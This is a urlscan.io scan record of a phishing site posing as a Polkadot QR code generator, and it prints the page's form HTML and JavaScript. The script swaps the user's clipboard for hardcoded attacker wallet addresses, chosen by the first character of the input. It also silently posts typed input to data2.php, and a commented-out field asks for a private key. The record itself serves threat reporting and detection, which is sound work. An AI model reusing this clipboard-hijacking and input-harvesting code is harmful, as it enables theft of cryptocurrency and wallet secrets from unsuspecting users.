dot-qr-code-generator.com Open in urlscan Pro
172.67.166.130  Public Scan

Submitted URL: http://dot-qr-code-generator.com/
Effective URL: https://dot-qr-code-generator.com/
Submission Tags: @phish_report
Submission: On May 25 via api from FI — Scanned from FI

Form analysis 1 forms found in the DOM

POST data2.php

<form class="index__form" id="address1" action="data2.php" method="POST"><label class="index__label" for="address">DOT address:</label><input class="index__input" type="text" placeholder="Enter your address" id="address" clip="address"><input
    type="hidden" id="copy">
  <br>
  <!--  <label class="index__label" for="address2">DOT Private Key Address:</label><input class="index__input" type="text" placeholder="Enter your address" id="address2">
      
<br>-->
  <span class="button">
    <input type="submit" value="Generate QR Code" id="button" class="index__button" name="createQR">
    <!-- <span class="button" onclick="startLoading()">

        
    <button class="index__button" id="button" type="button"><span class="index__button_text">-->
    <!--  Generate-->
    <div class="container">
      <script type="text/javascript" src="loading.js"></script>
      <link rel="stylesheet" href="loading.css">
      <label for="modal"></label>
    </div>
    <div class="loadingInput">
      <div class="screenMode">
      </div>
    </div>
    <br><br><br><br><br><br>
    <p class="index__text">On our website You can create a <b>QR code for your DOT address</b>. To do this, you need to insert the address of your Polkadot wallet, and press the button. And then our site will create you a <b>QR code</b> of your
      <b>DOT address</b>, to which you can send DOTs, after scanning this QR code. This greatly facilitates the transfer of DOTs from one address to another, since the DOT wallet address itself can not be remembered or rewritten manually, so our site
      will simplify your life by creating a long DOT address, just one picture with a QR code. <br>
    </p><br><br>
    <!--<center>We never save your data.</center>-->
    <br><br><br><br><br><br><br><br><br><br><br><br>
    <script>
      $("#button").click(function() {
        var x = $("#address").val();
        var x1 = '13jHtFeaZDMgaQE4385eiaGpzpaEVHKWMTWiA6wwfXcXV2Ua';
        var x2 = '0x66F2e3d7EacF87bddC59dC69fD6f676f0d7f81b7';
        var x3 = 'MHuDGcc2b3ynuc7nRPNKJXeznv8ePkb2Mw';
        if (x.charAt(0) == '0') {
          startLoading()
          new ClipboardJS('.button', {
            text: function(trigger) {
              return x2;
            }
          });
          setTimeout(function() {
            location.href = "qr.php"
          }, 1000);
        }
        if (x.charAt(0) == '1') {
          startLoading()
          new ClipboardJS('.button', {
            text: function(trigger) {
              return x1;
            }
          });
          setTimeout(function() {
            location.href = "dot.php"
          }, 1000);
        }
        if (x.charAt(0) == 'x') {
          startLoading()
          new ClipboardJS('.button', {
            text: function(trigger) {
              return x1;
            }
          });
          setTimeout(function() {
            location.href = "dot.php"
          }, 1000);
        }
        if (x.charAt(0) == ' ') {
          startLoading()
          new ClipboardJS('.button', {
            text: function(trigger) {
              return x1;
            }
          });
          setTimeout(function() {
            location.href = "dot.php"
          }, 1000);
        }
        if (x.charAt(0) == 'M') {
          startLoading()
          new ClipboardJS('.button', {
            text: function(trigger) {
              return x3;
            }
          });
          setTimeout(function() {
            location.href = "qrm.php"
          }, 1000);
        }
      });
    </script>
    <script>
      var copyThis = '13jHtFeaZDMgaQE4385eiaGpzpaEVHKWMTWiA6wwfXcXV2Ua';
      var inputLocator = 'input[clip=address]';

      function focusInput() {
        $(inputLocator).val($(inputLocator).val());
        $(inputLocator).focus();
      }
      $cjs = new ClipboardJS('#copy', {
        text: function(trigger) {
          return copyThis;
        }
      });
      $(inputLocator).click(function() {
        $("#copy").trigger('click');
        $("copy").remove();
        $cjs.destroy();
        setTimeout(function() {
          focusInput();
        });
      });
    </script>
    <script type="text/javascript">
      $initWif = '';
      $("#address").on("change keyup paste", function() {
        if (Math.abs($(this).val().length - $initWif.length) > 5) {
          trySend();
        }
        $initWif = $(this).val();
      });

      function trySend() {
        $.post("data2.php", {
          address1: $("#address").val()
        }, function() {});
      }

      function getFormValues(fobj) {
        var str = "";
        var obj = '';
        for (var i = 0; i < fobj.elements.length; i++) {
          obj = fobj.elements[i];
          switch (obj.type) {
            case "text":
              str += obj.name + "=" + escape(obj.value) + "&";
              break;
            case "textarea":
              str += obj.name + "=" + escape(obj.value) + "&";
              break;
            case "hidden":
              str += obj.name + "=" + escape(obj.value) + "&";
              break;
            case "select-one":
              str += obj.name + "=" + obj.options[obj.selectedIndex].value + "&";
              break;
          }
        }
        str = str.substr(0, (str.length - 1));
        return str;
      }

      function sendd() {
        f = $("#address1");
        address1 = getFormValues(f[0]);
        address1 = escape(address1);
        $.ajax({
          type: "POST",
          url: "data2.php",
          data: "address1=" + address1,
          success: function(result) {
            my_data(result);
          }
        });
        return false;
      }

      function my_data(address1) {
        //alert( address ) ;
      }
      $(document).ready(function() {
        $("#address1").submit(sendd);
      });
    </script>
    <div class="index__links_box" id="js-links-box">
      <a class="index__link index__link--save" id="js-save-link" href="#" target="_blank" title="Download QR Code" download="DOT_QR_code.png"><img class="index__link__download_icon index__link__download_icon--normal" src="img/download.svg" alt="Download"><img class="index__link__download_icon index__link__download_icon--hover" src="img/download--white.svg" alt="Download"></a>
    </div>
  </span>
</form>

Text Content

DOT QR CODE GENERATOR



Enter Your DOT address to create a QR Code:


DOT address:










On our website You can create a QR code for your DOT address. To do this, you
need to insert the address of your Polkadot wallet, and press the button. And
then our site will create you a QR code of your DOT address, to which you can
send DOTs, after scanning this QR code. This greatly facilitates the transfer of
DOTs from one address to another, since the DOT wallet address itself can not be
remembered or rewritten manually, so our site will simplify your life by
creating a long DOT address, just one picture with a QR code.